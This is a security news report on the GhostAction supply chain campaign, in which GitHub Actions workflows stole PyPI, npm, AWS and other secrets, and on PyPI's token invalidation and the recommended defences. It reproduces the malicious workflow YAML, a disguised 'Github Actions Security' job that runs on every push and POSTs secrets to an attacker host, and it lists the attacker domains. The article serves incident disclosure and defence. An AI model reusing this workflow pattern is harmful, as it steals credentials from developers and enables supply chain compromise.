The Python Software Foundation has confirmed the invalidation of all PyPI tokens compromised during the GhostAction supply chain attack in early September 2025. This decisive action follows an investigation confirming that although threat actors successfully exfiltrated tokens, they did not use them to publish malicious packages to the Python Package Index. The attack, which targeted GitHub’s CI/CD infrastructure, resulted in the theft of 3,325 sensitive secrets from 327 GitHub user accounts across 817 repositories, creating significant secondary supply chain risks1.
This incident highlights the evolving threat landscape where software supply chains are targeted through developer account compromises and malicious CI/CD workflows. The response from platform providers and security researchers prevented a more severe outcome, but the event serves as a critical case study in supply chain security for development and security teams.
Attack Vector and Initial Compromise
The GhostAction campaign was first detected on September 5th, 2025, through a compromised repository for the Python package FastUUID. A maintainer (user `Grommash9`) pushed a malicious commit titled “Add Github Actions Security workflow” on September 2nd. This commit injected a GitHub Actions workflow specifically designed to steal secrets, particularly the `PYPI_API_TOKEN`, by exfiltrating it via an HTTP POST request to a remote, attacker-controlled server (`hxxps://bold-dhawan.45-139-104-115.plesk.page`)149.
GitGuardian’s security team identified the malicious activity and promptly alerted the FastUUID maintainers through a GitHub issue while simultaneously notifying PyPI administrators. The maintainer reverted the malicious commit within hours of notification, and PyPI placed the project in read-only mode by 12:11 PM on September 5th, preventing any malicious package releases from this specific repository19. This rapid response contained the immediate threat but revealed only the tip of a much larger campaign.
Campaign Scale and Techniques
Further investigation revealed that FastUUID was merely one victim in a massive, coordinated campaign. The attackers employed a consistent pattern across all compromised repositories: initial access to developer GitHub accounts (likely via phishing or compromised credentials), reconnaissance to analyze legitimate workflow files and enumerate available secret names, injection of tailored malicious workflows that hardcoded specific secret names, and systematic exfiltration to attacker-controlled endpoints169.
The malicious workflow used a simple but effective design that could be triggered on any push event or manual workflow_dispatch:
“`yaml
name: Github Actions Security
on: [workflow_dispatch, push]
jobs:
send-secrets:
runs-on: ubuntu-latest
steps:
– name: Prepare Cache Busting
run: echo “CACHE_BUST=$(date +%s)” >> $GITHUB_ENV
– name: Github Actions Security
run: |
curl -s -X POST -d ‘SECRET_NAME=${{ secrets.SECRET_NAME }}…’ hxxps://bold-dhawan.45-139-104-115.plesk.page
“`
The scale of the breach was substantial, with 3,325 confirmed secrets stolen including DockerHub credentials, GitHub personal access tokens, npm publishing tokens, PyPI credentials, Cloudflare API tokens, AWS access keys, and various database credentials1689. Several companies had their entire multi-language SDK portfolios (Python, Rust, JavaScript, Go) compromised simultaneously, and attackers were confirmed to be actively using stolen credentials for follow-on attacks against other systems.
Response and Mitigation Efforts
GitGuardian undertook a massive disclosure effort, creating issues on 573 affected repositories. This prompted widespread remediation, with 100 repositories having already reverted the malicious changes before being notified. The security firm also notified the security teams at GitHub, npm, and PyPI on September 5th1. Shortly after the campaign was discovered and remediation began, the attacker’s exfiltration endpoint stopped resolving10.
On September 9th, a second wave of attacks began, targeting primarily previously compromised repositories with an updated payload. Approximately 500 new commits were pushed, affecting 14 new repositories. The attackers used new exfiltration domains (`hxxps://carte-avantage.com`, `hxxps://objective-hopper.45-139-104-115.plesk.page`) that resolved to the same IP address (45.139.104.115), which had recently been associated with hosting phishing payloads19.
The Python Software Foundation confirmed that although tokens were exfiltrated, none were abused to publish malicious packages to PyPI. Mike Fiedler of PyPI explained that an initial disclosure email from GitGuardian on September 5th was missed due to spam filtering, delaying a full response until September 10th25. As a precautionary measure, the PSF invalidated all affected PyPI tokens and strongly recommended that users migrate from long-lived API tokens to Trusted Publishers, which uses short-lived, repository-scoped OIDC tokens for authentication25.
Security Recommendations and Best Practices
Organizations should immediately audit their repositories for the indicators of compromise associated with GhostAction, including specific domains, IP addresses, filenames, and commit messages. All secrets that existed in compromised repositories must be revoked and rotated immediately, regardless of whether they were confirmed stolen. Implementing security policies such as branch protection rules, mandatory reviews for workflow changes, and tools like StepSecurity’s “Secret Exfiltration Policy” can help prevent unauthorized secret access6.
The migration to modern authentication methods like OIDC-based Trusted Publishers for both PyPI and npm publishing represents a fundamental shift in securing software supply chains. This approach drastically reduces the impact of secret exfiltration attacks by eliminating long-lived tokens. Additionally, enforcing least privilege principles for CI/CD secrets and enabling GitHub’s secret scanning alerts with push protection provides additional layers of defense against similar attacks9.
The GhostAction campaign demonstrates that malicious workflows have become a primary attack vector capable of compromising entire software portfolios through automated secrets exfiltration at CI/CD runtime. While the coordinated response prevented catastrophic malicious package releases, the incident underscores the urgent need for robust identity management, vigilant repository monitoring, and widespread adoption of modern, secure publishing practices across all software ecosystems.
